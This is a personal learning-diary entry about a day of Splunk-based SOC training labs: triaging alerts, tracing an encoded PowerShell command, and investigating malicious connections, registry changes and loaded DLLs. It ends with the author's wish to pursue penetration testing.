We kept digging deeper into Splunk investigations, and for the first time, I came across an encrypted PowerShell command with clear malicious intent. The task? Find the URL that initiated a web request. It wasn’t easy, I struggled for a bit but eventually, I cracked it. That moment of “Yes, I found it!” felt great.
After a bit of theory, we dove into SOC fundamentals, starting with triage. Which is essentially the process of prioritizing alerts based on their severity, urgency, and potential impact. It’s like digital first aid: not every alert needs immediate action, but some absolutely do.
We put that theory into action with a practical lab where we analyzed an alert related to port scanning. That part was pretty chill, a relatively calm morning overall.
But then the afternoon hit and things got real.
We started a new investigation that made me want to punch my computer. Our task was to identify two outbound connections to a known malicious IP address. Then, we had to track down a registry key change made during the attack. I was already boiling, but I pushed through.
Next, we needed to figure out which processes were killed by the binaries. That step took time, patience, and a lot of trial and error. Finding the right sourcetype and just simple keyword searches is absolutely key in Splunk. Another malicious binary popped up, and with it, another task: track down the DLLs loaded by that binary.
By the end of the day, my brain hurt, but in a good way. And for me? All this just confirmed it – I’m definitely aiming for the penetration tester path. Defensive work is cool, but I want to be on the other side.
